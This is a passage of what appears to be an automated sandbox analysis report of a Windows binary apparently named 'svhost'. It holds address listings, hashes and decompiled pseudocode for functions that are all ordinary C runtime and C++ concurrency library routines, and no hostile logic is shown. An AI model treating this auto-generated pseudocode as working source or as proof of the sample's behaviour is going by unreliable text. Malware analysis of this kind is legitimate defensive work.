                                      0x00eb0f13
                                      0x00eb0f19
                                      0x00eb0f1d
                                      0x00eb0f2a
                                      0x00000000
                                      0x00eb0f1f
                                      0x00eb0f22
                                      0x00eb0f9c
                                      0x00eb0f9c
                                      0x00eb0f24
                                      0x00eb0f24
                                      0x00eb0f24
                                      0x00eb0f26
                                      0x00eb0f26
                                      0x00eb0f26
                                      0x00eb0f22
                                      0x00eb0f1d
                                      0x00eb0f9f
                                      0x00eb0fa7
                                      0x00eb0fa9
                                      0x00eb0fab
                                      0x00eb0fb3
                                      0x00eb0fb8
                                      0x00eb0fb9
                                      0x00eb0fba
                                      0x00eb0fbf
                                      0x00eb0fc0
                                      0x00eb0fc3
                                      0x00eb0fdd
                                      0x00eb0fe0
                                      0x00eb0fe5
                                      0x00eb0fe7
                                      0x00000000
                                      0x00eb0fe9
                                      0x00eb0ff5
                                      0x00eb0ff8
                                      0x00eb0ff9
                                      0x00eb0ffb
                                      0x00eb101e
                                      0x00eb1020
                                      0x00eb1037
                                      0x00eb103e
                                      0x00eb1043
                                      0x00000000
                                      0x00eb1022
                                      0x00eb1029
                                      0x00eb102e
                                      0x00000000
                                      0x00eb102e
                                      0x00eb0ffd
                                      0x00eb1004
                                      0x00eb1009
                                      0x00eb100a
                                      0x00eb100a
                                      0x00eb100f
                                      0x00000000
                                      0x00eb100f
                                      0x00eb0ffb
                                      0x00eb0fc5
                                      0x00eb0fcb
                                      0x00eb0fcd
                                      0x00eb0fcf
                                      0x00eb0fd8
                                      0x00000000
                                      0x00eb0fd1
                                      0x00eb0fd1
                                      0x00eb0fd4
                                      0x00eb104e
                                      0x00eb104e
                                      0x00eb1053
                                      0x00eb1056
                                      0x00eb1057
                                      0x00eb1058
                                      0x00eb105f
                                      0x00eb1061
                                      0x00eb1066
                                      0x00eb1069
                                      0x00eb1087
                                      0x00eb108a
                                      0x00eb108f
                                      0x00eb1091
                                      0x00000000
                                      0x00eb1093
                                      0x00eb109f
                                      0x00eb10a3
                                      0x00eb10a5
                                      0x00eb10ca
                                      0x00eb10cc
                                      0x00eb10e5
                                      0x00eb10ec
                                      0x00000000
                                      0x00eb10ce
                                      0x00eb10ce
                                      0x00eb10d7
                                      0x00eb10dc
                                      0x00000000
                                      0x00eb10dc
                                      0x00eb10a7
                                      0x00eb10a7
                                      0x00eb10a7
                                      0x00eb10b0
                                      0x00eb10b5
                                      0x00eb10b6
                                      0x00eb10b6
                                      0x00000000
                                      0x00eb10bb
                                      0x00eb10a5
                                      0x00eb106b
                                      0x00eb1071
                                      0x00eb1073
                                      0x00eb1075
                                      0x00eb1082
                                      0x00000000
                                      0x00eb1077
                                      0x00eb1077
                                      0x00eb107a
                                      0x00eb10f4
                                      0x00eb10f4
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107e
                                      0x00eb107e
                                      0x00eb107e
                                      0x00eb107a
                                      0x00eb1075
                                      0x00eb10f7
                                      0x00eb10ff
                                      0x00eb1101
                                      0x00eb1101
                                      0x00eb1108
                                      0x00eb0fd6
                                      0x00eb1046
                                      0x00eb1046
                                      0x00eb1048
                                      0x00000000
                                      0x00eb104a
                                      0x00eb104d
                                      0x00eb104d
                                      0x00eb1048
                                      0x00eb0fd4
                                      0x00eb0fcf
                                      0x00eb0fad
                                      0x00eb0fb2
                                      0x00eb0fb2

                                      APIs
                                      • GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                      • _free.LIBCMT ref: 00EB0F5E
                                      • _free.LIBCMT ref: 00EB0F94
                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_free
                                      • String ID:
                                      • API String ID: 2283115069-0
                                      • Opcode ID: 704d9d77df9afff79ed5fef8e46719890cd054bb27630c79de7407c968444dc0
                                      • Instruction ID: 8dcb7854a8abbb97c99a13f601255b248eb108d5214a0d6a3b53ec7cac5a4a13
                                      • Opcode Fuzzy Hash: 704d9d77df9afff79ed5fef8e46719890cd054bb27630c79de7407c968444dc0
                                      • Instruction Fuzzy Hash: 3411E9B63042856FC63177BDAC81DFB269AEBC57747242135F324FB1E2EE61AC094560
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5C660 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E00E5C660(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				signed int _t31;
				signed int _t32;
				intOrPtr* _t40;
				signed char _t42;
				signed int _t73;

				_t72 = __esi;
				_t71 = __edi;
				_t51 = __ebx;
				_push(0xffffffff);
				_push(0xec0958);
				_push( *[fs:0x0]);
				_t31 =  *0xeef074; // 0x221cac15
				_t32 = _t31 ^ _t73;
				_v20 = _t32;
				_push(_t32);
				 *[fs:0x0] =  &_v16;
				_v32 = __ecx;
				E00E515C0( &_v28, 8);
				E00E57830( &_v28, _v32 + 0x14);
				_v8 = 0;
				_t69 =  *_v32;
				if(( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0xc))))() & 0x000000ff) == 0) {
					_t40 = E00E53840( &_v48, _v32);
					_t69 =  &_v28;
					_t42 = E00E5DAE0(__ebx, _v32 + 0x44, __edi, __esi, __eflags, __fp0,  &_v28, _a4,  *_t40);
					__eflags = _t42 & 0x000000ff;
					if((_t42 & 0x000000ff) == 0) {
						_v44 = 1;
						_v8 = 0xffffffff;
						E00E577E0();
					} else {
						_v40 = 0;
						_v8 = 0xffffffff;
						E00E577E0();
					}
				} else {
					_v36 = 2;
					_v8 = 0xffffffff;
					E00E577E0();
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t51, _v20 ^ _t73, _t69, _t71, _t72);
			}

















                                      0x00e5c660
                                      0x00e5c660
                                      0x00e5c660
                                      0x00e5c663
                                      0x00e5c665
                                      0x00e5c670
                                      0x00e5c674
                                      0x00e5c679
                                      0x00e5c67b
                                      0x00e5c67e
                                      0x00e5c682
                                      0x00e5c688
                                      0x00e5c690
                                      0x00e5c69f
                                      0x00e5c6a4
                                      0x00e5c6ae
                                      0x00e5c6bd
                                      0x00e5c6e1
                                      0x00e5c6ed
                                      0x00e5c6f7
                                      0x00e5c6ff
                                      0x00e5c701
                                      0x00e5c71e
                                      0x00e5c725
                                      0x00e5c72f
                                      0x00e5c703
                                      0x00e5c703
                                      0x00e5c70a
                                      0x00e5c714
                                      0x00e5c719
                                      0x00e5c6bf
                                      0x00e5c6bf
                                      0x00e5c6c6
                                      0x00e5c6d0
                                      0x00e5c6d5
                                      0x00e5c73a
                                      0x00e5c74f

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ~unique_lock$unique_lock
                                      • String ID:
                                      • API String ID: 1747051668-0
                                      • Opcode ID: ed25abe261b9cb1046ab6c25c564585e861a5ec8df4dd81dde380862d5fcbdaf
                                      • Instruction ID: fd8e5e5d9c83e84039b388555c2f9b32ca974c204b91b5147056d16689d5782d
                                      • Opcode Fuzzy Hash: ed25abe261b9cb1046ab6c25c564585e861a5ec8df4dd81dde380862d5fcbdaf
                                      • Instruction Fuzzy Hash: CC312C74904209DFCB04DFA4D851BEEB7B4FF48755F109659E8227B2D1DB34690ACB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E53510 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 48%
                                      			E00E53510(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v28;
				intOrPtr* _v32;
				intOrPtr* _v36;
				char _v40;
				signed int _t28;
				signed int _t29;
				void* _t47;
				void* _t67;
				void* _t68;
				signed int _t69;

				_t68 = __esi;
				_t67 = __edi;
				_t64 = __edx;
				_t47 = __ebx;
				_push(0xffffffff);
				_push(0xebffe8);
				_push( *[fs:0x0]);
				_t28 =  *0xeef074; // 0x221cac15
				_t29 = _t28 ^ _t69;
				_v20 = _t29;
				_push(_t29);
				 *[fs:0x0] =  &_v16;
				if(_a12 != 0xffffffff) {
					E00E515C0( &_v28, 8);
					E00E572F0(E00E528C0());
					_v8 = 0;
					if((E00E56E90( &_v28) & 0x000000ff) == 0) {
						_v40 = 0;
						_v36 = E00E53640( &_v40);
						_t64 =  *_v36;
						 *((intOrPtr*)( *((intOrPtr*)( *_v36))))(_a4, _a8);
					} else {
						_v32 = E00E5A440( &_v28);
						_t64 =  *_v32;
						 *((intOrPtr*)( *((intOrPtr*)( *_v32))))(_a4, _a8);
					}
					_v8 = 0xffffffff;
					E00E56EC0();
				} else {
					_a4(_a8);
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t47, _v20 ^ _t69, _t64, _t67, _t68);
			}
















                                      0x00e53510
                                      0x00e53510
                                      0x00e53510
                                      0x00e53510
                                      0x00e53513
                                      0x00e53515
                                      0x00e53520
                                      0x00e53524
                                      0x00e53529
                                      0x00e5352b
                                      0x00e5352e
                                      0x00e53532
                                      0x00e5353c
                                      0x00e53552
                                      0x00e53560
                                      0x00e53565
                                      0x00e53579
                                      0x00e5359e
                                      0x00e535a9
                                      0x00e535b7
                                      0x00e535be
                                      0x00e5357b
                                      0x00e53583
                                      0x00e53591
                                      0x00e53598
                                      0x00e53598
                                      0x00e535c0
                                      0x00e535ca
                                      0x00e5353e
                                      0x00e53542
                                      0x00e53545
                                      0x00e535d2
                                      0x00e535e7

                                      APIs
                                      • shared_ptr.LIBCPMTD ref: 00E53560
                                      • Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores.LIBCMTD ref: 00E5356F
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E535CA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Base::ChoresConcurrency::details::Container_base12Container_base12::~_GroupScheduleSegmentUnrealizedshared_ptrstd::_
                                      • String ID:
                                      • API String ID: 2982896290-0
                                      • Opcode ID: e3f588d96ad8d375bcdf6d969c317330c044d86566caae29c6ecf1d93882b421
                                      • Instruction ID: 0d7b44e72e325a465825bb4304458dd086a2dbff9c07b11b191465495f53729b
                                      • Opcode Fuzzy Hash: e3f588d96ad8d375bcdf6d969c317330c044d86566caae29c6ecf1d93882b421
                                      • Instruction Fuzzy Hash: 05214D749001099FCB04EFA4C851AEEB7F4FF48310F505669E926A72D1DB34AA09CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB1054 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00EB1054(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0xeef2c0; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00EB163C(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00EB04C2(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00EB163C(__eflags,  *0xeef2c0, _t18);
							if(__eflags != 0) {
								E00EB0D2A(_t18, 0xef373c);
								E00EB051F(0);
								goto L13;
							} else {
								_t13 = 0;
								E00EB163C(__eflags,  *0xeef2c0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00EB163C(0,  *0xeef2c0, 0);
							_push(0);
							L9:
							E00EB051F();
							goto L4;
						}
					}
				} else {
					_t18 = E00EB15FD(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xeef2c0; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                      0x00eb105f
                                      0x00eb1061
                                      0x00eb1066
                                      0x00eb1069
                                      0x00eb1087
                                      0x00eb108a
                                      0x00eb108f
                                      0x00eb1091
                                      0x00000000
                                      0x00eb1093
                                      0x00eb109f
                                      0x00eb10a3
                                      0x00eb10a5
                                      0x00eb10ca
                                      0x00eb10cc
                                      0x00eb10e5
                                      0x00eb10ec
                                      0x00000000
                                      0x00eb10ce
                                      0x00eb10ce
                                      0x00eb10d7
                                      0x00eb10dc
                                      0x00000000
                                      0x00eb10dc
                                      0x00eb10a7
                                      0x00eb10a7
                                      0x00eb10a7
                                      0x00eb10b0
                                      0x00eb10b5
                                      0x00eb10b6
                                      0x00eb10b6
                                      0x00000000
                                      0x00eb10bb
                                      0x00eb10a5
                                      0x00eb106b
                                      0x00eb1071
                                      0x00eb1075
                                      0x00eb1082
                                      0x00000000
                                      0x00eb1077
                                      0x00eb107a
                                      0x00eb10f4
                                      0x00eb10f4
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107c
                                      0x00eb107e
                                      0x00eb107e
                                      0x00eb107e
                                      0x00eb107a
                                      0x00eb1075
                                      0x00eb10f7
                                      0x00eb10ff
                                      0x00eb1108

                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,00EA5F5C,00EB059C,?,?,00E89C45,00000000,?,00E5166C,00000000,?,00E5B6DC,00000000), ref: 00EB1059
                                      • _free.LIBCMT ref: 00EB10B6
                                      • _free.LIBCMT ref: 00EB10EC
                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00EA5F5C,00EB059C,?,?,00E89C45,00000000,?,00E5166C,00000000), ref: 00EB10F7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_free
                                      • String ID:
                                      • API String ID: 2283115069-0
                                      • Opcode ID: bbc1e441a7a8e5c0afa80538e451fcd26fd90c6766cc8629c9314cb8a5eabb0f
                                      • Instruction ID: 96280d2002c9d7e31758d6fe646fe333e692d9cc7899f270e45613de3b867245
                                      • Opcode Fuzzy Hash: bbc1e441a7a8e5c0afa80538e451fcd26fd90c6766cc8629c9314cb8a5eabb0f
                                      • Instruction Fuzzy Hash: 4A1148763042C42EC62173BDACE2DEB269AEBC53747682275F720FB1E3EE618C444120
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E53DE0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E00E53DE0(intOrPtr __ecx, void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _t20;
				signed int _t46;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				_push(0xffffffff);
				_push(0xec011e);
				_push( *[fs:0x0]);
				_t20 =  *0xeef074; // 0x221cac15
				 *[fs:0x0] =  &_v16;
				_v20 = __ecx;
				_v24 = _t47 - 4;
				E00E572F0(E00E528C0());
				_v28 = E00E524B0(_v20, _t52, _t20 ^ _t46);
				_v8 = 0;
				E00E53090(_v20, _v20 + 0xc);
				_v8 = 1;
				E00E53CF0(_v20 + 0x10);
				_v8 = 2;
				E00E53D90(_v20 + 0x18);
				 *((char*)(_v20 + 0x2c)) = 0;
				 *((char*)(_v20 + 0x2d)) = 0;
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}












                                      0x00e53de0
                                      0x00e53de3
                                      0x00e53de5
                                      0x00e53df0
                                      0x00e53df5
                                      0x00e53e00
                                      0x00e53e06
                                      0x00e53e0e
                                      0x00e53e19
                                      0x00e53e26
                                      0x00e53e29
                                      0x00e53e37
                                      0x00e53e3f
                                      0x00e53e4a
                                      0x00e53e52
                                      0x00e53e5c
                                      0x00e53e64
                                      0x00e53e6b
                                      0x00e53e6f
                                      0x00e53e7c
                                      0x00e53e88

                                      APIs
                                      • shared_ptr.LIBCPMTD ref: 00E53E19
                                        • Part of subcall function 00E572F0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00E57319
                                        • Part of subcall function 00E572F0: _Copy_construct_from.LIBCPMTD ref: 00E57325
                                      • Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E53E21
                                        • Part of subcall function 00E524B0: shared_ptr.LIBCPMTD ref: 00E524C7
                                        • Part of subcall function 00E524B0: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E524DD
                                      • Concurrency::cancellation_token::none.LIBCPMTD ref: 00E53E37
                                      • Concurrency::details::_Internal_task_options::_Internal_task_options.LIBCPMTD ref: 00E53E5C
                                        • Part of subcall function 00E53D90: Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack.LIBCPMTD ref: 00E53D9D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_CreationTaskshared_ptrstd::_$CallstackCallstack::_Concurrency::cancellation_token::noneConcurrency::scheduler_ptr::scheduler_ptrContainer_base12Container_base12::~_Copy_construct_fromInternal_task_optionsInternal_task_options::_Iterator_baseIterator_base::_
                                      • String ID:
                                      • API String ID: 1982005772-0
                                      • Opcode ID: d88071a8d93b265dc4ec28fe8c397ea6a4eca355e712b620cddabb4ceddacdb7
                                      • Instruction ID: 828454b30997b63d3d5292947561c13d0f6053712c10eb769ed95579ad9114e6
                                      • Opcode Fuzzy Hash: d88071a8d93b265dc4ec28fe8c397ea6a4eca355e712b620cddabb4ceddacdb7
                                      • Instruction Fuzzy Hash: D41142B1D04259DBCB04EFA8DD46BAFBBF4FB05314F044A69E811B7382D7756A048B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E58760 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 81%
                                      			E00E58760(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _t21;
				signed int _t22;
				signed char _t27;
				void* _t34;
				void* _t52;
				void* _t53;
				signed int _t54;

				_t53 = __esi;
				_t52 = __edi;
				_t34 = __ebx;
				_push(0xffffffff);
				_push(0xec06d8);
				_push( *[fs:0x0]);
				_t21 =  *0xeef074; // 0x221cac15
				_t22 = _t21 ^ _t54;
				_v20 = _t22;
				_push(_t22);
				 *[fs:0x0] =  &_v16;
				_v28 = __ecx;
				E00E586E0(_v28 + 0xd0,  &_a4);
				E00E57780( &_v24, _v28 + 0x14);
				_v8 = 0;
				_t27 = E00E54650(_v28);
				_t51 = _t27 & 0x000000ff;
				if((_t27 & 0x000000ff) == 0) {
					 *((intOrPtr*)(_v28 + 4)) = 3;
					_v8 = 0xffffffff;
					E00E57740();
					E00E534F0(_v28 + 0x50);
					E00E54BC0(_v28);
				} else {
					_v8 = 0xffffffff;
					E00E57740();
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t34, _v20 ^ _t54, _t51, _t52, _t53);
			}















                                      0x00e58760
                                      0x00e58760
                                      0x00e58760
                                      0x00e58763
                                      0x00e58765
                                      0x00e58770
                                      0x00e58774
                                      0x00e58779
                                      0x00e5877b
                                      0x00e5877e
                                      0x00e58782
                                      0x00e58788
                                      0x00e58798
                                      0x00e587a7
                                      0x00e587ac
                                      0x00e587b6
                                      0x00e587bb
                                      0x00e587c0
                                      0x00e587d6
                                      0x00e587dd
                                      0x00e587e7
                                      0x00e587f2
                                      0x00e587fa
                                      0x00e587c2
                                      0x00e587c2
                                      0x00e587cc
                                      0x00e587cc
                                      0x00e58802
                                      0x00e58817

                                      APIs
                                      • Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00E587A7
                                      • Concurrency::details::_Task_impl_base::_IsCanceled.LIBCPMTD ref: 00E587B6
                                      • SafeRWList.LIBCONCRTD ref: 00E587CC
                                      • SafeRWList.LIBCONCRTD ref: 00E587E7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_ListSafe$CanceledCriticalLock::_ReentrantScoped_lockScoped_lock::_Task_impl_base::_
                                      • String ID:
                                      • API String ID: 4001845217-0
                                      • Opcode ID: 32ae1d562184e39bbb6ecd0e6ae6f66490a16aec8e103309213e09f12e5733f5
                                      • Instruction ID: 3da2879307f965f681ab1dacbca5fce515d1090c419e1790c1d1019ab01792a8
                                      • Opcode Fuzzy Hash: 32ae1d562184e39bbb6ecd0e6ae6f66490a16aec8e103309213e09f12e5733f5
                                      • Instruction Fuzzy Hash: DA115B709041099BCB08EF98D952BBEBBB5EF44315F10562AE9267B2C2DF305A08CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E58540 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E00E58540(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, char _a4, signed char _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t21;
				signed int _t50;
				void* _t51;

				_push(0xffffffff);
				_push(0xec06a0);
				_t21 =  *0xeef074; // 0x221cac15
				_v20 = _t21 ^ _t50;
				 *[fs:0x0] =  &_v16;
				_v32 = __ecx;
				_v8 = 0;
				E00E515C0( &_v28, 8);
				E00E57830( &_v28, _v32 + 0x14);
				_v8 = 1;
				_v36 = _t51 - 0xc;
				E00E51430( &_a4);
				E00E59CC0(_v32,  &_v28, _a12 & 0x000000ff, _t21 ^ _t50,  *[fs:0x0]);
				_v8 = 0;
				E00E577E0();
				_v8 = 0xffffffff;
				E00E513E0();
				 *[fs:0x0] = _v16;
				return E00E89A35(__ebx, _v20 ^ _t50,  &_v28, __edi, __esi);
			}












                                      0x00e58543
                                      0x00e58545
                                      0x00e58554
                                      0x00e5855b
                                      0x00e58562
                                      0x00e58568
                                      0x00e5856b
                                      0x00e58577
                                      0x00e58586
                                      0x00e5858b
                                      0x00e5859d
                                      0x00e585a4
                                      0x00e585ac
                                      0x00e585b1
                                      0x00e585b8
                                      0x00e585bd
                                      0x00e585c7
                                      0x00e585cf
                                      0x00e585e4

                                      APIs
                                      • unique_lock.LIBCONCRTD ref: 00E58586
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E585A4
                                        • Part of subcall function 00E59CC0: std::make_error_code.LIBCPMTD ref: 00E59D00
                                        • Part of subcall function 00E59CC0: std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E59D18
                                        • Part of subcall function 00E59CC0: std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E59D3D
                                      • ~unique_lock.LIBCONCRTD ref: 00E585B8
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E585C7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
